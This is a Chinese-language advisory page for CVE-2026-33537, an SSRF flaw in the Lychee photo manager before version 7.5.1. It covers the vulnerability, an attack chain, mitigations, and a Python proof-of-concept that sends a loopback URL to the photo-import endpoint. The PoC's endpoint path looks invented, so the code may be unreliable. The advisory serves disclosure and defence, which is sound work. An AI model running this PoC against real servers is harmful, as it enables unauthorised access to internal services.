CVE-2026-33537 CVSS 5.0 中危

CVE-2026-33537 Lychee存在SSRF漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33537

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Lychee

漏洞概述

Lychee照片管理工具在7.5.1版本前存在SSRF漏洞，由于补丁对IP地址的验证不完整，未能过滤回环和链路本地地址。经过身份验证的攻击者可利用此漏洞绕过安全配置，通过直接IP地址访问内部服务。

技术细节

该漏洞源于Lychee组件`Photo::fromUrl`修复SSRF漏洞时引入的IP验证逻辑缺陷。尽管开发者试图阻止对外部URL的请求，但验证机制未能识别并拦截127.0.0.1（回环）和169.254.x.x（链路本地）等受限地址。攻击者只需低权限账号，即可构造指向内网IP的恶意URL。服务器接收请求后，因校验失效，会代为向内网发起连接。这导致攻击者能绕过所有四项保护配置，探测或利用内网敏感服务，造成信息泄露。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或获取一个Lychee平台的低权限用户账号。

STEP 2

2. 构造恶意请求

攻击者利用`Photo::fromUrl`接口，构造一个包含内网IP地址（如127.0.0.1）的URL作为图片地址。

STEP 3

3. 绕过验证

服务器端的IP验证逻辑存在缺陷，未能拦截回环地址，请求被放行。

STEP 4

4. 内网探测与攻击

服务器代替攻击者向内网发起请求，攻击者根据响应获取内网敏感信息或进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_ssrf(target_url, internal_ip, auth_token):
    """
    PoC for CVE-2026-33537
    Demonstrates bypass of IP validation to access internal services.
    """
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json"
    }
    
    # The endpoint responsible for importing photos from URL
    endpoint = f"{target_url}/api/Photo::fromUrl"
    
    # Payload targeting loopback address (bypassing the incomplete check)
    payload = {
        "url": f"http://{internal_ip}"
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] SSRF Successful! Response from internal service:\n{response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    TARGET = "http://vulnerable-lychee-instance.com"
    INTERNAL_TARGET = "127.0.0.1:80" # Loopback address
    TOKEN = "LOW_PRIVILEGE_USER_TOKEN"
    exploit_ssrf(TARGET, INTERNAL_TARGET, TOKEN)

影响范围

Lychee < 7.5.1

防御指南

临时缓解措施

建议立即将Lychee升级到7.5.1版本以彻底修复该漏洞。若暂时无法升级，应在服务器防火墙上阻断对127.0.0.0/8和169.254.0.0/16网段的出站连接，并严格审查对`Photo::fromUrl`接口的访问日志，监控异常的内网访问请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表